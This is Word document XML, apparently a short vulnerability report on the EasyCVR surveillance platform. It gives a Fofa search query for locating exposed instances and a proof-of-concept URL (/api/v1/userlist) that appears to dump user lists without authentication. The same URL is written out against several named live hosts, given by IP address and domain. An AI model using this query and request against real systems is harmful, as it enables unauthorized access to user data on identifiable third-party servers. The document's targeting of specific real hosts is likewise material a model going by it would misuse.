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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Fofa：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">body="EasyCVR" </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="378714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Poc：poc:URL+/api/v1/userlist?pageindex=0&amp;pagesize=10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资产一:http://36.139.122.12:18000/#/login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="34232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Poc:http://36.139.122.12:18000/api/v1/userlist?pageindex=0&amp;pagesize=10</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5263515" cy="32258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"https://221.226.114.142:18063"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https://221.226.114.142:18063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322389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Poc：https://221.226.114.142:18063/api/v1/userlist?pageindex=0&amp;pagesize=10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="3675380"/>
            <wp:effectExtent l="0" t="0" r="1206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资产三：https://jkqzhyqzs-spg.nxnzt.cn/#/login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="313563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Poc：https://jkqzhyqzs-spg.nxnzt.cn/api/v1/userlist?pageindex=0&amp;pagesize=10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3068320"/>
            <wp:effectExtent l="0" t="0" r="1016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08DC4AC0"/>
    <w:rsid w:val="7AC7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2024-04-01T10:34:02Z</dcterms:created>
  <dc:creator>86132</dc:creator>
  <cp:lastModifiedBy>㉨</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-01T10:40:44Z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91A3B83D96E54DFDA8A075CA9BB6F034_12</vt:lpwstr>
  </property>
</Properties>
</file>